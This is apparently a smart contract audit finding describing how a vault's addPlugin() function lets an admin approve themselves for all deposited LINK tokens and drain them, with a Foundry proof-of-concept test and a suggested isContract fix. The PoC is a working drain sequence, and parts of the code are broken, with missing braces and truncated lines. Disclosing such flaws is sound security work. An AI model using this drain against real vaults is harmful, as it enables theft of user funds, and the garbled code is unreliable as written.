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Users can be rugged by the admin user


The addPlugin() function is used to include external smart contracts such as Aave's v2 LendingPool to increase yield over time for LINK tokens. Due to a lack of sanity checks, the admin can rug users of all the link tokens in the vault.

Vulnerability Detail

when calling addPlugin(), the admin user can use this in an unintended way by specifying themselves as a "plugin" and pass their own address which will approve themselves to the maximum (type(uint256).max) number of LINK tokens contained in the vault. The admin is then free to transfer all link tokens out of the vault and into their wallet. This was awarded a "Medium" in severity because this finding relies on a malicious admin.


A malicious admin can steal all user funds. Even if the user is benevolent by the fact that there is a rug vector available, it may negatively impact the protocol’s reputation.

Code Snippet

Proof of Concept

pragma solidity ^0.8.9;

import "../../lib/forge-std/src/Test.sol";
import "../../lib/forge-std/src/console.sol";
import "../../src/Vault.sol";
import "../../src/AttackerContract.sol";
import "../utils/Token.sol";
import "openzeppelin/proxy/ERC1967/ERC1967Proxy.sol";

contract MyTests is Test {
    Token public link;
    Vault public vault;
    address implementation;
    address proxy;

    address public alice = vm.addr(1);
    address public bob = vm.addr(2);
    address public carol = vm.addr(3);
    address public dan = vm.addr(4);
    address public eve = vm.addr(5);
    address public frank = vm.addr(6);
    address public admin = vm.addr(7);

    function setUp() public {

        link = new Token("Chainlink", "LINK");
        implementation = address(new Vault());
        proxy = address(new ERC1967Proxy(implementation, ""));
        vault = Vault(proxy);
        vault.initialize(address(link), address(admin), 10e34, 1000);

    function testRugVector() public {, 10000 ether);, 1000 ether);

        link.approve(address(vault), 1000 ether);
        vault.deposit(1000 ether);

        uint256 vaultBalanceBeforeRug = link.balanceOf(address(vault));

        vault.addPlugin(address(admin), 0);
        link.transferFrom(address(vault), address(admin), link.balanceOf(address(vault)));

        uint256 adminBalancePostRug = link.balanceOf(address(admin));
        assertEq(vaultBalanceBeforeRug, adminBalancePostRug);


Tool used

Manual Review.


I recommend checking that the owner cannot use their own address as a plugin. In addition to this I recommend a check that EOA's cannot be used as plugins. See the example function to check if an address contains code below:

function isContract(address _addr) private returns (bool isContract){
  uint32 size;
  assembly {
    size := extcodesize(_addr)
  return (size > 0);

This will prevent the entire vault's balance from being transferred at once by a single EOA.